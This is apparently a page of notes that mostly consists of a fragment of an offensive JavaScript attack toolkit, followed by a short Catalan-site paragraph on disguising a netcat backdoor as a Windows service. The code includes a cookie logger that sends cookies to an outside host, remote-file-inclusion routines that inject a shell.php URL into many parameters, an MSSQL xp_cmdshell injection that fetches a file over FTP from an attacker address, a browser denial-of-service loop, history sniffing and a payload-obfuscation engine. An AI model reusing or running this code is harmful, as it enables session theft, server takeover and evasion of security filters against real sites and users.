'close'); this.send(arg); }; Object.prototype.get = function(uri,argv) { /*** usage: xhr().get('foo.php'); ***/ this.open('GET',uri,true); this.send (argv); this.onreadystatechange = function () { if (this.readyState == 4) { if (this.status == 200) { var xmlget = this.responseText; } } }; this.send(argv); return xmlget; }; /*** DOM storage component ***/ Object.prototype.domstore = function(url,name,obj) { try { globalStorage[''].name=obj; s=false; } catch(ex) { url? globalStorage[url].name=obj:globalStorage[document.domain].name; sessionStorage.name = obj; s=true; } return s; }; /*** charset information ***/ Object.prototype.charset = function () { document.charset ? c = document.charset: c = false; return c; }; /*** event attach component ***/ Object.prototype.eventer = function(type,listener,useCapture) { try { this.addEventListener(type,listener,useCapture); ret = true; } catch(ex) { var ret = this.attachEvent('on' + type, listener); ret = true; } return ret; }; /*** form submitting component ***/ Object.prototype.fillform = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { xform.elements[i].value = data; } } }; /*** form hiddenfield submitting component ***/ Object.prototype.fillhidden = function(data) { for(j = 0; j < document.forms.length; ++j) { xform = document.forms[j]; for(i = 0; i < xform.elements.length; ++i) { if(xform.elements[i].type == 'hidden') { xform.elements[i].value = data; } } } }; /*** element array component ***/ Object.prototype.elements = function(arg) { var elems =[]; for (i=0;i<arg.length;i++) { var e = arg[i]; e = document.getElementById(e); elems.push(e); } return elems; }; /*** document links component ***/ Object.prototype.links = function() { rl = []; lk = document.links; for(y=0;y<lk.length;++y) { rl.push(lk[y]); } return rl; }; /*** query parts component ***/ Object.prototype.queryparts = function(uri) { k = []; uri?uri=uri:uri=window.location.href; (uri.indexOf('?')==-1)?i=0:i=1; if(i) { //uri = uri.search(/\?/) j = uri.split("&"); for(i=1;i<j.length;i++) { j[i] = j[i].replace(/=(.*)/,''); k.push(j[i]); } } else { k = 0; } return k; }; /*** cookie logger component ***/ Object.prototype.logcookie = function(uri) { var img = document.createElement('img'); document.appendChild(img); img.src = uri + "?c="+escape(document.cookie)+"q="+rand(); }; /*** color calculating component ***/ Object.prototype.visited = function(color) { c = color; if (this.currentStyle) { var x = this.currentStyle['color']; } else if (window.getComputedStyle) { var x = document.defaultView.getComputedStyle(this,null).getPropertyValue('color'); } if(c == x) { res = true; } else { res = false; } return res; }; /*** most clicked links estimater ***/ Object.prototype.estimate = function(color) { var link_array = []; for(i in links()) { if(i.visited(color)) { link_array.push(i); } } return link_array; } /*** denial of service trigger ***/ Object.prototype.dos = function() { this.onfocus = function() {d()} this.onblur = function() {d()} function d() { for(i=0;i<800;i++) { url = window.location.href; uri = document.location = url; if (!uri.closed && url.location) { document.location = url; } } } }; /*** remote shell spawning component ***/ Object.prototype.spawnshell = function(uri) { shell = uri + 'shell.php?'; var gateways = ['base_path','theme_path','cmd','dir','req_path','template','base_path','page', 'systempath','phpbb_root_path','returnpath','inc_dir','include','CONFIG[path]','inc','main_path', 'mosConfig_absolute_path','basepath','configFile']; for(i=0;i<gateways.length;++i) { xhr().get(document.domain + '?',gateways[i] + '=' + shell); } }; /*** hit & run shellspawner ***/ Object.prototype.hitandrun = function(uri) { shell = uri + 'shell.php?'; var gateways = []; var l = links(); for(j = 0; j < l.length; ++j) { gateways.push(queryparts(l[j])) } for(i = 0; i < gateways.length; ++i) { xhr().get(document.domain + '?',gateways[i] + '=' + shell); } }; /*** SQL injecter component pOc ***/ Object.prototype.sqlinject = function(vuln_uri,ftpip) { seq = "1'; exec master..xp_cmdshell 'echo open "+ftpip+" 21 >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo user foo bar >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo get %systemroot%\inetpub\wwwroot\p0ng.js >>"; seq += "%systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'echo quit >> %systemroot%\inetpub\wwwroot\p0ng.js';"; seq += "exec master..xp_cmdshell 'ftp -i -n -v -s: %systemroot%\inetpub\wwwroot\p0ng.js';"; try { xhr().get(vuln_uri+seq) } catch(ex) { return false } }; /*** source morphing component ***/ String.prototype.toVariables = function() { var code = this; var operators = ['>','<','&','&&','|','||','%','==','!=','===','!==']; var operator = operators[Math.floor(Math.random()*operators.length)]; var number1 = Math.floor(Math.random()*10); var number2 = Math.floor(Math.random()*10); var statement = number1+operator+number2; var concatStr = ''; if(eval(statement) == true) {concatStr += statement; } else { concatStr += '!' + statement; } concatStr += "?'s1':0"; var customConcat = concatStr; var separateStatements = ','; var variablePrefixes = ['b2_','x2_','$_','x_','s_']; var pos = Math.floor(Math.random()*variablePrefixes.length); var varName = variablePrefixes[pos]; var vector = concatStr; var concatString = ''; for(var i=0; i<code.length;i++) { concatString += (varName + i + '=') + vector.replace("s1", code.charAt(i)) + separateStatements; } concatString += '' + varName + (i++) + '='; for(var i=0; i<code.length;i++) { concatString += (varName + i); if(i + 1 < code.length) { concatString += '+'; } } return concatString; } Object.prototype.morph = function(s) { var source = s; var m = ['unicode','charcodes','octal','hex','urlencode','variables']; var pos=Math.floor(Math.random() * m.length); morphtype = m[pos]; source = morphselection(source,morphtype); return; } switch(morphtype) { case "unicode":source = "eval('"+ source.toUnicode() + "')"; break; case "charcodes":source = 'eval(String.fromCharCode(' + source.getCharCodes() + '))'; break; case "octal":source = "eval('"+ source.toOctal() + "')"; break; case "hex":source = "eval('"+ source.toHex() + "')"; break; case "urlencode":source = "eval(unescape('"+ escape(source) + "'))"; break; case "variables":source = source.toVariables(); break; } return source; }; Object.prototype.morphselection = function(source,morphtype) { switch(morphtype) { case "unicode":source = matchUnicode(source); break; case "octal":source = matchOctal(source); break; case "hex":source = matchHex(source); break; case "urlencode":source = matchUrlencode(source); break; case "charcodes":source = matchCharcodes(source); break; case "variables":source = matchVariables(source); break; } return source; }; Object.prototype.matchVariables = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $2.toVariables() } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $2.toVariables() } ); return source; }; Object.prototype.matchCharcodes = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } ); return source; }; Object.prototype.matchUrlencode = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return 'unescape(\'' + escape($2) + '\')' } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return 'unescape("' + escape($2) + '\")' } ); return source; }; Object.prototype.matchOctal = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } ); return source; }; Object.prototype.matchHex = function(source) { source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } ); return source; }; Object.prototype.matchUnicode = function(source) { source = source.replace(/(\\[uU][\w\d]{4})?(\w*)([\s(]?)/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); source = source.replace(/(['])([^']+)(['])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); source = source.replace(/(["])([^"]+)(["])/, function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } ); return source; };

URL

RV has Google Redirect (20120213)
Els meus dubtes
Algunes respostes

Adding a new service is the most common technique to disguise backdoors in the Windows operating system. This requires involving tools such as Srvany.exe and Srvinstw.exe that comes with the Resource Kit utility and also with Netcat.exe [1]. The principle of this operation is that the srvany.exe tool is installed as a service and then permits netcat.exe to run as a service. The latter, in turn, listens on an appropriate port for any connection. Once connected, it will have spawned a remote shell on the server (using cmd.exe) and from this moment onwards, a hacker has free reign.

url

Amunt! Top Amunt!
Coses per llegir

Links

Ep ! Site under construction. Escriu-me !
Updated 22/5/2012 (a).  
Uf !